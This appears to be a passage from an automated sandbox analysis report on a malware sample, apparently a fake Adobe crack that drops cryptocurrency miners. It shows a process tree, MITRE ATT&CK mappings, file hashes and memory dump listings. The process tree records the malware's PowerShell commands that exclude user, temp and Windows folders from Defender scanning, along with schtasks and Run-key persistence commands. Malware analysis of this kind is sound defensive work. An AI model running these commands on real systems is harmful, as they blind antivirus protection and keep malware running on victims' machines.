"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
6⤵
PID:4748

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3208

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3336

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2788

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2704

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
6⤵
PID:4832

C:\Users\Admin\AppData\Local\Temp\svchost32.exe
C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
7⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4492

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
8⤵
PID:3396

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
9⤵
- Scheduled Task/Job: Scheduled Task
PID:4396

C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
"C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
8⤵
- Executes dropped EXE
PID:1396

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
8⤵
PID:5028

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
9⤵
PID:1192

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
5⤵
PID:4652

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
6⤵
PID:1556

C:\Windows\SysWOW64\update.exe
"C:\Windows\system32\update.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2040

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c copy update.exe %APPDATA% && reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Service /D "%APPDATA%\update.exe" -f
3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1312

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Service /D "C:\Users\Admin\AppData\Roaming\update.exe" -f
4⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:4568

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
#cmd
3⤵
- System Location Discovery: System Language Discovery
PID:964

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost64.exe.log

Filesize
539B

MD5
b245679121623b152bea5562c173ba11

SHA1
47cb7fc4cf67e29a87016a7308cdb8b1b4dc8e3d

SHA256
73d84fd03e38f1bbf8b2218f8a454f0879051855252fc76b63f20f46e7fd877f

SHA512
75e46843b1eafcc7dc4362630838895b7f399e57662a12bf0305a912c8e726b02e0a760b1b97a2c262b2d05fdb944b9ed81c338ad93e5eb5cb57bc651602e42c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
2e748ddf581f550274480cd8e7af8f3f

SHA1
215cb6c1be660dce956414811c1f2a61f24df8a5

SHA256
dea0d4b95fa1862d4727595a8db26b809a681c9f634857432bfe1d8cf36577be

SHA512
460c779273d8c39941572f23d3c249b5e3ec822ce12139021d8abba4ad6208365c7b3032988609502480836c2589c8fb006fca970f5d1c4f47bb7f1a11100e49

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
4e3d2a35e9cdaa902d8fb69ce702cfe4

SHA1
079f2138c2d03cbe0e129c6ebc28bc5d830ee306

SHA256
00c314937d0e06b14e64b55533cf2f3b48ad865f5f44c835aed8a407569fad1d

SHA512
d5e33f8474ca77aac0f6f3129571a61d2dcd9ec0bd68f7ecc89514ae2cf4f42a0f4ee105e53475d2634ea4afea8aeccbd44e41178a5e3de3feefffb452cb571b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
31b9aa82bd0a5700a0525698e2bf0a83

SHA1
faacd87d9af460b06eb70538291f8b9e8ed2bed3

SHA256
584e87e21bafee6f67775b35edc2f72da02101976e2172f141d0d4c9b6c03162

SHA512
b715bd56c3728e1526891cf2df36fb6712eba6ce3092ac16bd5adaa1c2a73f2b1e6b47164ed15f5a4473aa1db8decd97c1ec2ff435e35124bedc7afb26a2d56a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
e95a4c05c42d90371ca6868599b4627f

SHA1
97cff1fc8850f2587199f75ea3f8a2d40a182970

SHA256
cf91ddda04e0ccca15edffc1800b3d4744f76cc20621bcc60dee71000d28cea0

SHA512
36301eb0b64b3c75c24b4cdd7562fbb49c8cdae1bc94da554eef56e2e80cd02ad2949c6983dac9f99dcd30406ffe9483e76dbfd60be65b3336a8410bfdd7e53b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
9b80cd7a712469a4c45fec564313d9eb

SHA1
6125c01bc10d204ca36ad1110afe714678655f2d

SHA256
5a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d

SHA512
ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
9c740b7699e2363ac4ecdf496520ca35

SHA1
aa8691a8c56500d82c5fc8c35209bc6fe50ab1d9

SHA256
be96c91b62ba9ba7072ab89e66543328c9e4395150f9dbe8067332d94a3ecc61

SHA512
8885683f96353582eb871209e766e7eba1a72a2837ce27ea298b7b5b169621d1fa3fce25346b6bfd258b52642644234da9559d4e765a2023a5a5fc1f544cc7af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
9072d3c4faa83ef0f5ed5b299b75618d

SHA1
f2bb8ee12abae6da1406fc566810ce397f1d054b

SHA256
9f9196488c5ae1227d43941675252f2399ef20aebba80ed6a829822104c40475

SHA512
a7bb981438e7d0932291531f49c00ca2b57a5c44cedede2b81f5a6abeefb4f00434e0c2edb2d3ad33c21e61e88091042f9d783f9fd39b18cfd1306b450f1f6bb

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gr2b11sw.zfw.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost32.exe

Filesize
23KB

MD5
a62ea2ade261009540d77e9fe64151c3

SHA1
6e49139ba8715a6604cce412a70ae3aaab85da25

SHA256
e9310bece7f0b3a543f727e4eb893ed3bea6694287a00bdf56f90591e0eb4221

SHA512
b36baddd4314cd6553d59701ab7c622b69c19754182755f75060e431372f79fa17ef3f6a72369cd783cd835959ca1151eed754544bf2b1ded72913d6f9263732

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost64.exe

Filesize
37KB

MD5
2398af19987fa42ea0b0af39f971dac0

SHA1
e2d74b1bb2d7dd705c95be5e9c28dd7a2ba5e646

SHA256
716849b27ea4000c6711238980d7de59adda3cf0dcd5055b06d84b361f6402f2

SHA512
0eb926162a4fdbb9a0ea31ba49ad9e8deb5bf6faece4bf0785c46a83d405464294ec38aa4d08104de892219d1a3d8c9c87885c7d9629e792d8aec1168338296f

Download Submit
C:\Windows\SysWOW64\Adobe-GenP-2.7.exe

Filesize
1.3MB

MD5
6467e9dd5d86c741aed49060e6d3fcd2

SHA1
a3c784836d993cc2cd9a9087a23559fa05567d02

SHA256
7b8d9ff34315e1787cdb62e682b3ba8dedd9f28d7cd374afe057babaf335edd4

SHA512
9f3b46f4b4c2839e2cd6c6ca2fb2b859af0e22a9c8276b26b32c83ca5f9d95c3cefb44cd82dc78cbe427de04e92e86ceface836f45c3263a8a5a1ca7c1dc48e7

Download Submit
C:\Windows\SysWOW64\ETC1final.exe

Filesize
31KB

MD5
e6eef993d7cdd5b5d3ba14c22ba7347b

SHA1
921bcf0d4bf3fd3cebd706a6e9dfe3901e32caea

SHA256
c84043ea0e8a98b478bbe03bfc16f0d64de4eb3e99ea5f7717b5d37843fe247e

SHA512
f832a156d8bfb45a81806563265bc78712a3cdfe7217efdd7515d5a01b846416f362a41ea97037e02461ce971ce9548e4265a84baa480af05d36223e994272bf

Download Submit
C:\Windows\SysWOW64\XMRfinal.exe

Filesize
45KB

MD5
34c74daeeaf8a3aab61553a507b329c7

SHA1
8a28ede427de7fc4088a8ababe018c2284b93c2b

SHA256
8ad91fe964e0a868a0260a6142a94a2b7fa930be6d79fff4dbe199f38f7be17b

SHA512
114571ba25987bdbdb623d233bd9f52b9ff049ce52723cc0e68d715eed633c62b604e95ec8191e2bda10fe6aaa55d63ccbc1f9af36f2a6d11d2ac744ee2adf73

Download Submit
C:\Windows\SysWOW64\update.exe

Filesize
375KB

MD5
3ea6458b6a66860e0b494f4d23d80991

SHA1
e32f4c1d1601997a6c3a5745de5be87b84ffb167

SHA256
005e7927bf7df1153921f511ac3fe6527f039db911cec0d9ad7201bfa65054bf

SHA512
44487f251fd8f9f0a0adfaf7da10da43a58d22b3332cf15a8d88a407c56838f331468eb249d995a28a57c0992361c810501c0062be53791d12000df267ab5cee

Download Submit
C:\Windows\System32\Microsoft\Libs\sihost64.exe

Filesize
7KB

MD5
56da2835319cea01989c1c9974e3d92d

SHA1
6af5d3e866a1d84149aaed7866cbcd81bbbf1997

SHA256
d4671ce89aad24e2d2dd69afdc41d9b917e5aadeca4a1d0d3f41f0a2ed20748b

SHA512
275fdf1a5ee1b5010896c342acac1b3062908c574be5cb865afe9608017cef09f47147d375089bfa325c038647b68a3a48f48e9c535191d6160beac8591eaba2

Download Submit
C:\Windows\System32\Microsoft\Telemetry\sihost32.exe

Filesize
8KB

MD5
5b89737512666e0c07e776cb507243b5

SHA1
07ac2821e0fd2a91740e8b82c0a99cf5aa029270

SHA256
4cd89e7f4e6df328938daddcb7f96ae91408dba48c57727e3c36b424a221be50

SHA512
e2496518de02f2a4b731a1f2938a45eefbf4e070af7b1d35c03d81b8fdecc710d62aca40be4d57b4f0b479ed8699eb03586518bb3cc1815820a35cb69f46ae95

Download Submit
memory/736-430-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/736-432-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/736-424-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/736-431-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/736-425-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/736-429-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/736-426-0x00000000003E0000-0x0000000000400000-memory.dmp

Filesize
128KB

Download
memory/736-428-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/764-418-0x0000000000710000-0x0000000000716000-memory.dmp

Filesize
24KB

Download
memory/948-263-0x0000000000FC0000-0x0000000000FCA000-memory.dmp

Filesize
40KB

Download
memory/964-249-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/1396-422-0x00000000003D0000-0x00000000003D6000-memory.dmp

Filesize
24KB

Download
memory/1760-137-0x0000000006800000-0x000000000684C000-memory.dmp

Filesize
304KB

Download
memory/1760-126-0x00000000063C0000-0x0000000006714000-memory.dmp

Filesize
3.3MB

Download
memory/1760-138-0x0000000074520000-0x000000007456C000-memory.dmp

Filesize
304KB

Download
memory/1760-148-0x0000000007A20000-0x0000000007AC3000-memory.dmp

Filesize
652KB

Download
memory/1760-159-0x0000000007D10000-0x0000000007D21000-memory.dmp

Filesize
68KB

Download
memory/1760-160-0x0000000007D50000-0x0000000007D64000-memory.dmp

Filesize
80KB

Download
memory/2040-48-0x00000000001A0000-0x0000000000206000-memory.dmp

Filesize
408KB

Download
memory/2040-73-0x00000000078C0000-0x0000000007E64000-memory.dmp

Filesize
5.6MB

Download
memory/2524-262-0x0000000000730000-0x000000000073E000-memory.dmp

Filesize
56KB

Download
memory/2524-264-0x0000000001500000-0x0000000001512000-memory.dmp

Filesize
72KB

Download
memory/3308-289-0x0000021DED170000-0x0000021DED192000-memory.dmp

Filesize
136KB

Download
memory/3484-52-0x0000000004B50000-0x0000000004BB6000-memory.dmp

Filesize
408KB

Download
memory/3484-101-0x00000000073E0000-0x0000000007A5A000-memory.dmp

Filesize
6.5MB

Download
memory/3484-53-0x00000000052C0000-0x0000000005326000-memory.dmp

Filesize
408KB

Download
memory/3484-51-0x0000000004AB0000-0x0000000004AD2000-memory.dmp

Filesize
136KB

Download
memory/3484-98-0x0000000006BE0000-0x0000000006BFE000-memory.dmp

Filesize
120KB

Download
memory/3484-78-0x0000000006C20000-0x0000000006C52000-memory.dmp

Filesize
200KB

Download
memory/3484-54-0x0000000005330000-0x0000000005684000-memory.dmp

Filesize
3.3MB

Download
memory/3484-107-0x0000000006FE0000-0x0000000006FF4000-memory.dmp

Filesize
80KB

Download
memory/3484-79-0x0000000070DE0000-0x0000000070E2C000-memory.dmp

Filesize
304KB

Download
memory/3484-100-0x0000000006C60000-0x0000000006D03000-memory.dmp

Filesize
652KB

Download
memory/3980-149-0x0000000074520000-0x000000007456C000-memory.dmp

Filesize
304KB

Download
memory/4104-235-0x0000000070DE0000-0x0000000070E2C000-memory.dmp

Filesize
304KB

Download
memory/4220-193-0x0000000070DE0000-0x0000000070E2C000-memory.dmp

Filesize
304KB

Download
memory/4496-183-0x0000000070DE0000-0x0000000070E2C000-memory.dmp

Filesize
304KB

Download
memory/4540-225-0x0000000070DE0000-0x0000000070E2C000-memory.dmp

Filesize
304KB

Download
memory/4728-105-0x0000000007C10000-0x0000000007C21000-memory.dmp

Filesize
68KB

Download
memory/4728-109-0x0000000007D30000-0x0000000007D38000-memory.dmp

Filesize
32KB

Download
memory/4728-102-0x0000000007A10000-0x0000000007A2A000-memory.dmp

Filesize
104KB

Download
memory/4728-89-0x0000000070DE0000-0x0000000070E2C000-memory.dmp

Filesize
304KB

Download
memory/4728-77-0x0000000006710000-0x000000000675C000-memory.dmp

Filesize
304KB

Download
memory/4728-74-0x00000000066E0000-0x00000000066FE000-memory.dmp

Filesize
120KB

Download
memory/4728-108-0x0000000007D50000-0x0000000007D6A000-memory.dmp

Filesize
104KB

Download
memory/4728-103-0x0000000007A80000-0x0000000007A8A000-memory.dmp

Filesize
40KB

Download
memory/4728-104-0x0000000007C90000-0x0000000007D26000-memory.dmp

Filesize
600KB

Download
memory/4728-49-0x0000000003100000-0x0000000003136000-memory.dmp

Filesize
216KB

Download
memory/4728-106-0x0000000007C40000-0x0000000007C4E000-memory.dmp

Filesize
56KB

Download
memory/4728-50-0x00000000057E0000-0x0000000005E08000-memory.dmp

Filesize
6.2MB

Download
memory/4844-254-0x00007FFA35F70000-0x00007FFA36A31000-memory.dmp

Filesize
10.8MB

Download
memory/4844-39-0x0000000000490000-0x00000000004A0000-memory.dmp

Filesize
64KB

Download
memory/4844-248-0x00007FFA35F70000-0x00007FFA36A31000-memory.dmp

Filesize
10.8MB

Download
memory/4844-47-0x00007FFA35F70000-0x00007FFA36A31000-memory.dmp

Filesize
10.8MB

Download
memory/4844-40-0x00007FFA35F73000-0x00007FFA35F75000-memory.dmp

Filesize
8KB

Download
memory/4848-44-0x0000000000200000-0x000000000020C000-memory.dmp

Filesize
48KB

Download